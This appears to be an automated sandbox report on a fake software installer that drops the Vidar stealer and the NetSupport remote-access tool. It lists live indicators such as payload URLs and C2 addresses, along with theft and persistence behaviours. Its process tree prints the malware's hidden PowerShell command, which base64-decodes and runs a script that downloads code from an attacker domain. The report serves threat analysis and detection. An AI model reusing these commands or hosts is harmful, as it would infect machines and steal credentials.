Analysis
max time kernel: 503s
max time network: 600s
platform: windows11-21h2_x64
resource: win11-20241007-en
resource tags: arch:x64 arch:x86 image:win11-20241007-en locale:en-us os:windows11-21h2-x64 system
submitted: 12-11-2024 17:35
Static task: static1
Behavioral task: behavioral1
Sample: Setup_Installer_1.3.6_x64.exe
Resource: win11-20241007-en
General
Target: Setup_Installer_1.3.6_x64.exe
Size: 49.3MB
MD5: 29fa71fab96724091fdf7a66dca09c67
SHA1: 15fcb631fa6cc825639cd4e15d37d844faac6fdd
SHA256: 882759dd0f306ab06f597c2db3011e82eff5bb7515de5d28a20b6913fe7f5626
SHA512: 12acf8548f03d230b28d7b5c1eb9009e2ebd7abb06f781c38c15f0d04bae32aded9e692ade4541c2b89e27398de4da853a2a00e94637fea67db4174f710d8a04
SSDEEP: 1572864:NwfwuNI9XY9hQtPkGKTD85uMWW7z0PbYF:NCu9oAdETgu3f8F
Malware Config
Extracted
http://gatugo.com/paz/pan4.zip
http://gatugo.com/paz/pan1.zip
http://gatugo.com/paz/pan3.zip
http://gatugo.com/paz/pan2.zip
http://gatugo.com/pan/
Extracted
vidar
11.7
721d3f29688b3d8f568f99a7d2115582
https://5.75.214.111
https://t.me/m07mbk
https://steamcommunity.com/profiles/76561199801589826
user_agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Signatures

Detect Vidar Stealer 2 IoCs
resource yara_rule
behavioral1/memory/2768-1023-0x0000000000880000-0x0000000000ADC000-memory.dmp family_vidar_v7
behavioral1/memory/2768-1565-0x0000000000880000-0x0000000000ADC000-memory.dmp family_vidar_v7
NetSupport
NetSupport is a remote access tool sold as legitimate system administration software.
Netsupport family
Vidar family
Blocklisted process makes network request 2 IoCs
flow pid Process
14 400 powershell.exe
19 4048 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process
3924 powershell.exe
400 powershell.exe
Downloads MZ/PE file
Uses browser remote debugging 2 TTPs 12 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid Process
648 msedge.exe
4688 msedge.exe
3432 chrome.exe
5080 chrome.exe
5532 msedge.exe
5968 msedge.exe
5960 msedge.exe
3476 chrome.exe
4832 chrome.exe
1028 chrome.exe
5468 msedge.exe
3056 msedge.exe
Executes dropped EXE 7 IoCs
pid Process
4276 install.exe
3056 javaw.exe
3956 DPMHelper.exe
4400 DPMHelper.exe
3088 DPMHelper.exe
4200 DPMHelper.exe
3036 client32.exe
Loads dropped DLL 64 IoCs
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows\CurrentVersion\Run\HardDiskHealth = "C:\\Users\\Admin\\AppData\\Roaming\\HardDiskHealth\\client32.exe" powershell.exe
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc
1 pastebin.com
12 pastebin.com
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target
PID 3088 set thread context of 3188 3088 DPMHelper.exe 144
PID 4200 set thread context of 688 4200 DPMHelper.exe 146
Drops file in Windows directory 31 IoCs
description ioc Process
File created C:\Windows\Installer\e57b8b3.msi msiexec.exe
File opened for modification C:\Windows\Installer\MSI8B91.tmp msiexec.exe
File opened for modification C:\Windows\Installer\e57b8b1.msi msiexec.exe
File opened for modification C:\Windows\Installer\MSIB9EB.tmp msiexec.exe
File opened for modification C:\Windows\Installer\e57b8b2.msi msiexec.exe
File created C:\Windows\SystemTemp\~DFD6EFEA456A740EFA.TMP msiexec.exe
File created C:\Windows\Installer\e57b8b1.msi msiexec.exe
File created C:\Windows\Installer\e57b8b2.msi msiexec.exe
File opened for modification C:\Windows\Installer\MSI4906.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI8B32.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI8BA2.tmp msiexec.exe
File opened for modification C:\Windows\SystemTemp chrome.exe
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe
File opened for modification C:\Windows\Installer\MSIBA3A.tmp msiexec.exe
File created C:\Windows\Installer\SourceHash{AD6AAEE5-41ED-4385-99F2-A705FF5B53CD} msiexec.exe
File created C:\Windows\SystemTemp\~DF28A1F5EC6C811071.TMP msiexec.exe
File opened for modification C:\Windows\Installer\MSI4956.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI8BC4.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI9654.tmp msiexec.exe
File created C:\Windows\SystemTemp\~DF71D695DF1A1FF963.TMP msiexec.exe
File opened for modification C:\Windows\Installer\MSI4878.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI4916.tmp msiexec.exe
File created C:\Windows\SystemTemp\~DFA9F5AAA809D50C05.TMP msiexec.exe
File opened for modification C:\Windows\Installer\MSI8BB3.tmp msiexec.exe
File opened for modification C:\Windows\Installer\ msiexec.exe
File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe
File opened for modification C:\Windows\SystemTemp chrome.exe
File opened for modification C:\Windows\Installer\MSIB93E.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSIBA6A.tmp msiexec.exe
File opened for modification C:\Windows\Installer\e57b8b3.msi msiexec.exe
File opened for modification C:\Windows\Installer\MSI8BA3.tmp msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 46 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = [value missing from the extracted page] vssvc.exe
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe
Delays execution with timeout.exe 1 IoCs
pid Process
5416 timeout.exe
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Modifies data under HKEY_USERS 2 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133759071488491598" chrome.exe
Modifies registry class 2 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings firefox.exe
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2499603254-3415597248-1508446358-1000\{764E6412-54FB-4A52-A9A8-F6806B53E440} chrome.exe
Suspicious behavior: EnumeratesProcesses 48 IoCs
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process
3088 DPMHelper.exe
4200 DPMHelper.exe
688 cmd.exe
3188 cmd.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 64 IoCs
Suspicious use of SendNotifyMessage 12 IoCs
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process
3056 javaw.exe
3036 client32.exe
3036 client32.exe
5308 firefox.exe
3036 client32.exe
3036 client32.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe"1⤵
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup 1.3.4\install\F5B53CD\Installer.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Setup_Installer_1.3.6_x64.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1731192677 " AI_EUIMSI=""2⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1620
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 292741160E5CF6CA2598F61EACF77561 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3828
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:3744
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 32E19A5DB6013FF8C507918C602C82052⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:940
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 13E67165B3A95CC20BA6C6831F578A0C C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2012
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 96C093BADE6DADA41CB9D931F027B1E12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4608
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 63D46283B43D3F4487420F00C94844C1 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1624
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 319F737CD11F04D840E95A7FE81B487C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4976
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\install.exe"C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\install.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\jre\bin\javaw.exe"C:\Users\Admin\AppData\Roaming\United legacy corporation\Setup\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 650015⤵
- System Location Discovery: System Language Discovery
PID:4608
C:\Windows\system32\reg.exeC:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"5⤵PID:2176
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8665⤵
- System Location Discovery: System Language Discovery
PID:912
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List5⤵
- System Location Discovery: System Language Discovery
PID:4048
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com5⤵
- System Location Discovery: System Language Discovery
PID:5068
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8665⤵
- System Location Discovery: System Language Discovery
PID:4552
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List5⤵
- System Location Discovery: System Language Discovery
PID:4700
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com5⤵
- System Location Discovery: System Language Discovery
PID:2260
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"4⤵
- System Location Discovery: System Language Discovery
PID:1196 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 8665⤵
- System Location Discovery: System Language Discovery
PID:1720
C:\Windows\SysWOW64\wbem\WMIC.exeC:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List5⤵
- System Location Discovery: System Language Discovery
PID:3360
C:\Windows\SysWOW64\more.comC:\Windows\System32\more.com5⤵
- System Location Discovery: System Language Discovery
PID:4820
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""4⤵
- System Location Discovery: System Language Discovery
PID:4596 -
C:\Windows\SysWOW64\chcp.comC:\Windows\System32\chcp.com 650015⤵
- System Location Discovery: System Language Discovery
PID:4816
C:\Windows\system32\reg.exeC:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"5⤵PID:4280
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $script}"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3924
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGY9J2h0dHBzOi8vZ2F0dWdvLmNvbS9oZWFsdGgucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtOZXQuU0VydkljRXBPSW50TUFOYWdlUl06OlNFY1VySXR5cHJvVG9Db2wgPSBbbkV0LlNFQ1VyaVRZUHJPVG9jT0x0eXBFXTo6VExTMTI7ICRnb2cgPSBpd3IgJGYgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkZ29nLkNvbnRlbnQ7')); Invoke-Expression $script}"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nopro -EXE BYpAss -wiN H -encOdEdC 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5⤵
- Blocklisted process makes network request
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4048 -
C:\Users\Admin\AppData\Roaming\HardDiskHealth\client32.exe"C:\Users\Admin\AppData\Roaming\HardDiskHealth\client32.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3036
C:\Windows\SysWOW64\cmd.execmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/6c962a106f793249c113dfe4730096aa/" && (for %F in (*.exe) do start "" "%F")"4⤵
- System Location Discovery: System Language Discovery
PID:688 -
C:\Users\Admin\AppData\Local\Temp\6c962a106f793249c113dfe4730096aa\DPMHelper.exe"DPMHelper.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3956 -
C:\Users\Admin\AppData\Roaming\mwa_patchv3\DPMHelper.exeC:\Users\Admin\AppData\Roaming\mwa_patchv3\DPMHelper.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3088 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3188 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe8⤵
- System Location Discovery: System Language Discovery
PID:2100
C:\Windows\SysWOW64\cmd.execmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/d88411800fe77bcb1fb2f8d962f05525/" && (for %F in (*.exe) do start "" "%F")"4⤵
- System Location Discovery: System Language Discovery
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\d88411800fe77bcb1fb2f8d962f05525\DPMHelper.exe"DPMHelper.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4400 -
C:\Users\Admin\AppData\Roaming\streamMonitorerrv2_x86\DPMHelper.exeC:\Users\Admin\AppData\Roaming\streamMonitorerrv2_x86\DPMHelper.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4200 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:688 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe8⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2768 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"9⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3432 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff843d2cc40,0x7ff843d2cc4c,0x7ff843d2cc5810⤵PID:5088
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1932,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:210⤵PID:4408
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1732,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:310⤵PID:4360
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2172,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:810⤵PID:2604
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3132 /prefetch:110⤵
- Uses browser remote debugging
PID:5080
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3140,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:110⤵
- Uses browser remote debugging
PID:3476
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4484,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4528 /prefetch:110⤵
- Uses browser remote debugging
PID:4832
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4612,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:810⤵PID:3600
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3608,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:810⤵PID:3132
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4596,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:810⤵PID:4880
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4512,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4996 /prefetch:810⤵PID:648
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5020,i,12184367888653900508,15394573142912444566,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5004 /prefetch:810⤵PID:2948
